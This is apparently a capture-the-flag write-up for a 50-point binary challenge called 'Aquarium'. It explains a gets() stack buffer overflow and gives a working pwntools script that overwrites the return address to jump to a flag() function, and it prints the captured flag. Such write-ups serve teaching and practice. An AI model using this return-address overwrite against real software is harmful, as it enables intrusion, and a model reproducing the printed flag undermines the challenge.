Aquarium

Category: Binary
Points: 50
Description: Here’s a nice little program that helps you manage your fish tank.

Super simple buffer overflow challenge. They use the gets() function which reads an unlimited amount of input which is able to overwrite the stack.

Using a cylic pattern in gdb to detect where the offset is we find that the $rsp overwrite is at 152 bytes. Then we get the address of the flag() function and append that to our output so the return address of the function goes to the flag() function and prints the flag.

I used pwntools to exploit this binary, code is below

import struct
from pwn import *

sh = remote('shell.actf.co', 19305)
for i in range(6): # go through the thingo options by sending a 1
    sh.recvuntil(':')
    sh.sendline('1')

print(sh.recvuntil(':')) 


buf = "A"*152 # inital 152 bytes of junk
buf += struct.pack("<Q", 0x4011b6) #pack little endian 64 bit of flag() address

sh.sendline(buf)
sh.interactive() #get flag

And that will pop the flag for you

FLAG:

actf{overflowed_more_than_just_a_fish_tank}

Leave a Reply

Your email address will not be published. Required fields are marked *